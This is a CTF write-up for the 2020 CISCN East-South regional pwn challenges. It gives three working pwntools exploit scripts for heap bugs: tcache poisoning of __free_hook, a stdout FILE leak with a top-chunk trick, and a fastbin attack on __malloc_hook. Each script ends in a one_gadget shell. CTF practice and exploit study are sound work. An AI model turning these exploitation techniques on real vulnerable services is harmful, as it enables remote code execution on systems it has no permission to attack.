2020 ciscn 华东南分区赛 pwn wp



pwn3

pwn4 repeat

#!/usr/bin/python
#coding:utf-8

from pwn import *


# One context call: debug logging prints every byte sent/received (handy for a
# CTF exploit, noisy for anything else), amd64/linux selects the packing ABI,
# and timeout=1 stops recv*() from blocking forever on a dead target.
context.update(log_level='debug',arch='amd64',os='linux',timeout=1)

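if args.Q:
	# Remote target. pwntools exposes KEY=VALUE command-line pairs via `args`,
	# so run as: python exp.py Q=1 HOST=<host> PORT=<port>.
	# (The original called remote() with no arguments, which raises TypeError.)
	io=remote(args.HOST,int(args.PORT))
else:
	io=process("./repeat")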


def cir(sz,ct1,ct2):
	"""One round of the program's loop: answer the size prompt, then two
	content prompts (the binary appears to read the content twice, hence
	'repeat').  Each answer is newline-terminated."""
	script = (("Size: ", str(sz)), ("Content: ", ct1), ("Content: ", ct2))
	for prompt, answer in script:
		io.sendlineafter(prompt, answer)

if __name__=="__main__":
	# Two 0x410-byte rounds.  A request this large is above the tcache limit
	# (0x408 on glibc 2.27), so when the program frees it the chunk lands in
	# the unsorted bin with fd/bk pointing into main_arena.  The first Content
	# is empty, so only the newline (0x0a) lands in the chunk and clobbers the
	# low byte of fd -- which is why the offset below ends in 0x0a
	# (main_arena+0x60 = 0x...ca0 on 2.27).
	cir(0x410,'','a')
	cir(0x410,'','a')
	libc=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3ebc0a
	log.success("libc==>"+hex(libc))
	# Hard-coded offsets; they match glibc 2.27 (Ubuntu 18.04) and must be
	# recomputed for any other build.
	free_hook=libc+0x3ed8e8
	one_gadgets=libc+0x4f3c2
	# Heap overflow: 0x40 bytes fill the chunk, then a forged header
	# (prev_size 0, size 0x31) for the following chunk.  The second round
	# additionally writes free_hook where that chunk's tcache fd lives --
	# tcache poisoning.  Exact layout was tuned against the binary; confirm
	# in gdb (breakpoint below) before reusing.
	cir(0x40,'b'*0x40+p64(0)+p64(0x31),'\x00')
	cir(0x40,'b'*0x40+p64(0)+p64(0x31)+p64(free_hook),'x')
	# Size 0x20 maps to the poisoned 0x30 bin: the first Content presumably
	# takes the forged chunk, the second gets __free_hook itself and writes
	# the one_gadget there; the next free() then jumps to it.
	io.sendlineafter("Size: ",str(0x20))
	io.sendlineafter("Content: ",'a')
	#gdb.attach(io,'b *0x0000555555554000+0xaa2')
	io.sendlineafter("Content: ",p64(one_gadgets))
	
	#gdb.attach(io,'b *0x0000555555554000+0xaa2')
	io.interactive()

pwn5 vuln

  • 程序只有 add 和 edit 两个功能,没有 free。思路是 IO_FILE 泄漏(io)加 House of Orange 式的 top chunk 改写(hoo):先用 edit 的堆溢出改小 top chunk 的 size 并用若干次 add 把它耗尽,然后在输入 size 时通过 scanf 塞入大量字符,让 scanf 自己 malloc/free 一块大缓冲区,把残留 chunk 送进 bin;再用 edit 溢出改写该 chunk 的 fd,使后面的 add 拿到 stdout 处的 chunk 完成泄漏。最后再来一次同样的流程,把 __malloc_hook 改成 one_gadget。
#!/usr/bin/python
#coding:utf-8

from pwn import *

# Tube settings, one attribute at a time: verbose byte-level logging, amd64
# Linux packing, and a 1s timeout so a dead target fails fast.
context.log_level='debug'
context.arch="amd64"
context.os='linux'
context.timeout=1


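if args.Q:
	# Remote target. pwntools exposes KEY=VALUE command-line pairs via `args`,
	# so run as: python exp.py Q=1 HOST=<host> PORT=<port>.
	# (The original called remote() with no arguments, which raises TypeError.)
	io=remote(args.HOST,int(args.PORT))
else:
	io=process("./vuln")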
	
def add(sz,ct='a'):
	"""Menu option 1: allocate `sz` bytes and send `ct` as the content.

	The content goes out with sendafter (no trailing newline) so binary
	payloads are delivered byte-exact.
	"""
	for prompt, answer in (("choice:\n", '1'), ("size:\n", str(sz))):
		io.sendlineafter(prompt, answer)
	io.sendafter("content:\n", ct)
def edit(sz,ct='a'):
	"""Menu option 2: write `ct` with a caller-chosen length `sz`.

	The program lets us pick `sz` independently of the chunk's real size,
	which is the heap-overflow primitive the rest of the exploit relies on.
	Content is sent raw (no newline).
	"""
	for prompt, answer in (("choice:\n", '2'), ("sz:\n", str(sz))):
		io.sendlineafter(prompt, answer)
	io.sendafter("content:\n", ct)
	
def leak():
	"""Leak libc through _IO_2_1_stdout_, then overwrite __malloc_hook.

	Despite the name this is the whole exploit.  There is no free primitive
	(only add/edit), so freed chunks are manufactured indirectly: the top
	chunk's size is shrunk via the edit() overflow and exhausted with
	allocations, then a very long answer to the size prompt makes scanf
	malloc/free a large temporary buffer, which pushes the leftover chunk
	through the bins.  A second overflow then plants a chosen fd so a later
	add() returns an arbitrary address.  All libc offsets are hard-coded
	(they look like glibc 2.30 / Ubuntu 19.10 values -- recompute for any
	other build); the heap sizes were tuned empirically against this binary.
	"""
	# Fixed 0x60xxxx address => non-PIE binary.  Presumably the binary's own
	# `stdout` variable: used as a tcache fd, the "chunk" that follows it is
	# the FILE* it contains, i.e. _IO_2_1_stdout_ -- TODO confirm in gdb.
	stdout=0x601020
	# Overflow from a 0x20 chunk into the top chunk header and shrink its
	# size so the 0x100 allocations below exhaust it.
	add(0x20)
	edit(0x30,'a'*0x20+p64(0)+p64(0x1000-0x250-0x30))
	for i in range(0xc):
		add(0x100)
	add(0x20)
	# 0x400 digits for the size prompt: scanf grows its buffer with a large
	# malloc that is freed again, which (presumably) retires the old top
	# remainder into a bin we can reach with a 0x70-sized request.
	io.sendlineafter("choice:\n",'1')
	io.sendlineafter("size:\n",'1'*0x400)
	# Overflow again: forge a 0x70 chunk header after our chunk and set its
	# fd to the stdout pointer.
	edit(0x60,'a'*0x20+flat(0,0x71,stdout))
	add(0x60)
	# One-byte write at the stdout pointer: keeps its low byte intact while
	# consuming that allocation (the content must be non-empty).
	add(0x60,'\x60')
	# Classic stdout leak on the FILE struct itself: _flags = 0xfbad1800,
	# _IO_read_* = 0 and the low byte of _IO_write_base cleared, so the next
	# flush dumps libc pointers before the real buffer.
	add(0x60,flat(0xfbad1800,0,0,0)+'\x00')
	libc=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x1e7570
	log.success("libc==>"+hex(libc))
	malloc_hook=libc+0x1e4c30
	# Four one_gadget candidates; index 2 is the one whose register
	# constraints held when this was run.
	one_gadget=libc+[0x106ef8,0xe237f,0xe2383,0xe2386][2]
	# Same top-chunk / scanf trick a second time, now planting __malloc_hook
	# as the fd so the second 0x30 add() returns the hook.
	add(0x20,'a')
	edit(0x30,'a'*0x20+p64(0)+p64(0x1000-0x30))
	for i in range(0xe):
		add(0x100)
	add(0x30)
	add(0x40)
	io.sendlineafter("choice:\n",'1')
	io.sendlineafter("size:\n",'1'*0x400)
	edit(0x70,'a'*0x40+flat(0,0x71,malloc_hook))
	add(0x30)
	add(0x30,p64(one_gadget))
	# Any further malloc now goes through the hook.
	io.sendlineafter("choice:\n",'1')
	io.sendlineafter("size:\n",str(0x10))
	#payload  = "A" * 0x10
	#payload += (p64(0) + p64(0x111) + p64(stdout))
	#edit(0x10 + 0x18, payload)
  
	#add(0x108, "dummy")
	#gdb.attach(io)
	io.interactive()
if __name__=='__main__':
	# leak() runs the whole exploit (leak + hook overwrite), not just the leak.
	leak()

pwn6 hidden

#!/usr/bin/python
#coding:utf-8
#off-by-null
from pwn import *

# Tube settings: amd64 Linux packing, 1s recv timeout, and debug-level
# logging so every byte on the wire is printed.
context.arch='amd64'
context.os='linux'
context.timeout=1
context.log_level='debug'


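if args.Q:
	# Remote target. pwntools exposes KEY=VALUE command-line pairs via `args`,
	# so run as: python exp.py Q=1 HOST=<host> PORT=<port>.
	# (The original called remote() with no arguments, which raises TypeError.)
	io=remote(args.HOST,int(args.PORT))
else:
	io=process("./hidden")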
def add(idx):
	"""Menu option 1: allocate slot `idx`.

	Every answer is sent twice -- once after the prompt and once blind --
	mirroring the binary's doubled prompts; the sequence is kept exactly.
	"""
	for prompt, answer in (("choice: \n\n", '1'), ("idx\n\n", str(idx))):
		io.sendlineafter(prompt, answer)
		io.sendline(answer)
	 
def edit(idx,ct):
	"""Menu option 2: write `ct` into slot `idx` (raw send, no newline).

	Menu choice and index are each sent twice, as with add().
	"""
	for prompt, answer in (("choice: \n\n", '2'), ("idx\n\n", str(idx))):
		io.sendlineafter(prompt, answer)
		io.sendline(answer)
	io.sendafter("mark\n\n", ct)
def dele(idx):
	"""Menu option 3: free slot `idx`.

	NOTE(review): the blind follow-up sends '2', not '3', unlike add()/edit()
	which repeat their own option.  Kept byte-for-byte because the exploit was
	run this way; confirm against the binary before changing it.
	"""
	slot = str(idx)
	io.sendlineafter("choice: \n\n", '3')
	io.sendline('2')
	io.sendlineafter("idx\n\n", slot)
	io.sendline(slot)
#heap=0x555555558460
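def leak():
	"""Leak libc from a freed chunk, then fastbin-dup onto __malloc_hook.

	The hard-coded offsets (__malloc_hook 0x3c4b10, realloc 0x84710, the four
	one_gadgets) are the well-known glibc 2.23 / Ubuntu 16.04 values; recompute
	them for any other libc.  The gdb breakpoint is now only attached when the
	script is run with GDB=1 -- the original always called gdb.attach(), which
	hangs any unattended or remote run.
	"""
	# Free slot 0 and overwrite the first 8 bytes; the program's reply then
	# contains a libc pointer (the 0x3c4d98 offset was determined empirically).
	add(0)
	dele(0)
	edit(0,'a'*8)
	leak=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3c4d98
	log.success("libc_base==>"+hex(leak))
	malloc_hook=leak+0x3c4b10
	#one_gadget=leak+[0x45226,0x4527a,0xf0364,0xf1207][1]
	one_gadget=leak+[0x45226,0x4527a,0xf0364,0xf1207][0]
	realloc=leak+0x84710
	# Fastbin attack: point the freed chunk's fd at __malloc_hook-0x23, where a
	# stray 0x7f byte serves as a plausible 0x70 fastbin size field.
	edit(0,p64(malloc_hook-0x23))
	add(1)
	add(0)
	# User data starts at __malloc_hook-0x13: 11 padding bytes reach
	# __realloc_hook (= __malloc_hook-8), which receives the one_gadget, and
	# __malloc_hook receives realloc+4.  Entering realloc past its first pushes
	# shifts the stack so the gadget's constraint is satisfied.
	edit(0,'\x00'*11+p64(one_gadget)+p64(realloc+4))
	#edit(0,'\x00'*19+p64(one_gadget))
	if args.GDB:
		gdb.attach(io,'b *0x7ffff7a522a4')
	# Next malloc goes through __malloc_hook -> realloc -> __realloc_hook.
	add(1)
	io.interactive()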
	
if __name__=="__main__":
	# leak() performs the full exploit (leak + __malloc_hook overwrite).
	leak()